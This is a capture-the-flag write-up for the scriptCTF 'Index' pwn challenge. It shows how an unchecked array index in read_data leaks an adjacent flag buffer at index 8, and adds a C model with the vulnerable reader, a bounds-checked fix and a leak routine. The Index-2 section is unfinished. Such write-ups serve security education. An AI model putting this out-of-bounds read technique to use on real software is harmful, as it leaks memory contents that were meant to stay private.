# pwn

## Challenges

<figure><img src="https://2268275695-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUrHD5lu5pQjrB9B8IR6W%2Fuploads%2F3Yg6gvlfSDxz53TUZXEf%2Fimage.png?alt=media&#x26;token=fa92b179-d2a1-4cc7-b0ea-1ade1e74ad25" alt=""><figcaption></figcaption></figure>

### Index

<figure><img src="https://2268275695-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUrHD5lu5pQjrB9B8IR6W%2Fuploads%2FmYFQsoMY94fiNKgdjcH6%2Fimage.png?alt=media&#x26;token=5c7508bb-0d20-4162-87e1-45b50ff45af1" alt=""><figcaption></figcaption></figure>

> I literally hand you the flag, just exploit it already!
>
> * [index.zip](https://storage.googleapis.com/scriptctf_challenges/Pwn/Index/index.zip)

```bash
❯ unzip -l index.zip
Archive:  index.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
    16632  2025-08-01 09:44   index
   225600  2025-08-01 12:25   ld-linux-x86-64.so.2
  2003408  2025-08-01 12:25   libc.so.6
---------                     -------
  2245640                     3 files
```

* Load it into [dogbolt](https://dogbolt.org/), or run `objdump -d` on it
* We can see this

  <figure><img src="https://2268275695-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUrHD5lu5pQjrB9B8IR6W%2Fuploads%2Fi5uRO2SMID48vBaQQIKu%2Fimage.png?alt=media&#x26;token=f16a0eb8-5631-439f-b113-0ae19e998979" alt=""><figcaption></figcaption></figure>
* `cmp $0x539` compares the user input with `0x539`, which is `1337` in decimal
* `je 150e` jumps to the hidden path if they are equal, confirmed with the decompiler

<figure><img src="https://2268275695-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUrHD5lu5pQjrB9B8IR6W%2Fuploads%2FpHcl9DbumnDLrmpCt7ih%2Fimage.png?alt=media&#x26;token=f7fc42f2-57f2-4f8f-816b-57cba4cb22e1" alt=""><figcaption></figcaption></figure>

* Entering 1337 triggers a hidden function that opens `flag.txt`
* We go to `LABEL_401448`, which is `menu()`

  <figure><img src="https://2268275695-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUrHD5lu5pQjrB9B8IR6W%2Fuploads%2FSSL2rIwVTGiqufMqBgEg%2Fimage.png?alt=media&#x26;token=f45f5dc1-107e-4574-89b7-5313185e6a85" alt=""><figcaption></figcaption></figure>
* Now we need option 2: `read_data` indexes the `nums` array without a bounds check, so an out-of-range index reads memory outside the array
* The flag buffer is at `0x40a0`

  <figure><img src="https://2268275695-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUrHD5lu5pQjrB9B8IR6W%2Fuploads%2Fp9MbrfyVq8NzKJjmTPPf%2Fimage.png?alt=media&#x26;token=efc8aaeb-f5f6-461d-92f5-de502c6d848c" alt=""><figcaption></figcaption></figure>
* We also know the `nums` array is at `0x4060`
* ```
  12c3:	48 8d 15 96 2d 00 00 	lea    0x2d96(%rip),%rdx        # 4060 <nums>
  ```
* Finally, the address that gets read is `nums_base + (index * 8)`, so each index steps 8 bytes (one `long`)

  <figure><img src="https://2268275695-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUrHD5lu5pQjrB9B8IR6W%2Fuploads%2F2jyEG8bBQowUA3CeAgT7%2Fimage.png?alt=media&#x26;token=7c859efe-0e46-4730-bde0-b67d1482d636" alt=""><figcaption></figcaption></figure>
* `Flag address - nums address = 0x40a0 - 0x4060 = 0x40 = 64 bytes`, and `64 bytes ÷ 8 bytes per index = 8`, so index `8` lands on the first 8 bytes of the flag; the following indices cover the rest of it 8 bytes at a time
* Final exploit:

<figure><img src="https://2268275695-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUrHD5lu5pQjrB9B8IR6W%2Fuploads%2F7FwINkNSgunzD4h8bJau%2Fimage.png?alt=media&#x26;token=0e1cf535-bc80-48b6-9401-c4fffba92b45" alt=""><figcaption></figcaption></figure>

* <mark style="color:blue;">`scriptCTF{4rra4y_00B_unl0ck3d_0aed67c7e137`</mark>
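The whole chain above (locate `nums`, locate the flag buffer, turn the distance into an index, read through the unchecked accessor) modelled in C as an added example. This is not the challenge binary's code: the struct `data_segment` fixes the 0x40 gap between `nums` and `flag` that the real binary gets from its link layout, the flag string is a constructed sample, and `read_data_vuln`, `read_data_safe`, `oob_index` and `leak_flag` are our names. `read_data_safe` shows the bounds check the real `read_data` lacks.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed model of the binary's data section: 8 longs in nums, then the
 * flag buffer 0x40 bytes after the start of nums (0x40a0 - 0x4060 in the
 * writeup). One struct pins the adjacency that the real binary gets from
 * the linker; this layout is an assumption for the demo. */
struct data_segment {
    long nums[8];   /* 64 bytes, only indices 0..7 are in bounds */
    char flag[64];  /* sits right after nums, like 0x40a0 after 0x4060 */
};

static struct data_segment seg = {
    .nums = {1, 2, 3, 4, 5, 6, 7, 8},
    .flag = "flag{constructed_sample_not_the_real_flag}", /* constructed */
};

/* Vulnerable read_data: computes nums_base + index * 8 with no check. */
long read_data_vuln(long index) {
    const char *base = (const char *)seg.nums;
    long value;
    memcpy(&value, base + index * (long)sizeof(long), sizeof value);
    return value;
}

/* Hardened read_data: rejects any index outside the array. */
int read_data_safe(long index, long *out) {
    size_t count = sizeof(seg.nums) / sizeof(seg.nums[0]);
    if (index < 0 || (size_t)index >= count)
        return -1;
    *out = seg.nums[index];
    return 0;
}

/* Index that makes nums[index] alias `target`; -1 if target is not
 * 8-byte aligned relative to nums_base (or lies before it). */
long oob_index(uintptr_t nums_base, uintptr_t target) {
    if (target < nums_base || (target - nums_base) % sizeof(long) != 0)
        return -1;
    return (long)((target - nums_base) / sizeof(long));
}

/* Leak the flag 8 bytes per read through the unchecked reader, stopping
 * at the first chunk that contains a NUL. Returns bytes written to out. */
size_t leak_flag(char *out, size_t out_len) {
    long first = oob_index((uintptr_t)seg.nums, (uintptr_t)seg.flag);
    size_t n = 0;
    if (first < 0)
        return 0;
    while (n + sizeof(long) <= out_len) {
        long chunk = read_data_vuln(first + (long)(n / sizeof(long)));
        memcpy(out + n, &chunk, sizeof chunk);
        n += sizeof chunk;
        if (memchr(&chunk, '\0', sizeof chunk) != NULL)
            break;
    }
    return n;
}

int main(void) {
    char buf[64];
    size_t n = leak_flag(buf, sizeof buf);
    long idx = oob_index(0x4060, 0x40a0); /* the writeup's numbers */
    printf("writeup index: %ld, leaked %zu bytes: %.*s\n",
           idx, n, (int)n, buf);
    return 0;
}
```

`oob_index(0x4060, 0x40a0)` gives 8, the same value derived above; `read_data_safe(8, ...)` refuses that index, which is the one-line fix the binary is missing.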

### Index-2

<figure><img src="https://2268275695-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUrHD5lu5pQjrB9B8IR6W%2Fuploads%2FlUMJsKB9gqX6nosmuYZL%2Fimage.png?alt=media&#x26;token=321a166f-e57e-4918-bffa-a5f54e86bbf3" alt=""><figcaption></figcaption></figure>

> This time, you get the file pointer, not the flag itself.
>
> * [index-2.zip](https://storage.googleapis.com/scriptctf_challenges/Pwn/Index2/index-2.zip)

```bash
❯ unzip -l index-2.zip
Archive:  index-2.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
    16608  2025-08-01 09:47   index-2
   225600  2025-08-01 12:23   ld-linux-x86-64.so.2
  2003408  2025-08-01 12:23   libc.so.6
---------                     -------
  2245616                     3 files
```

{% hint style="warning" %}
tbd, will write later
{% endhint %}
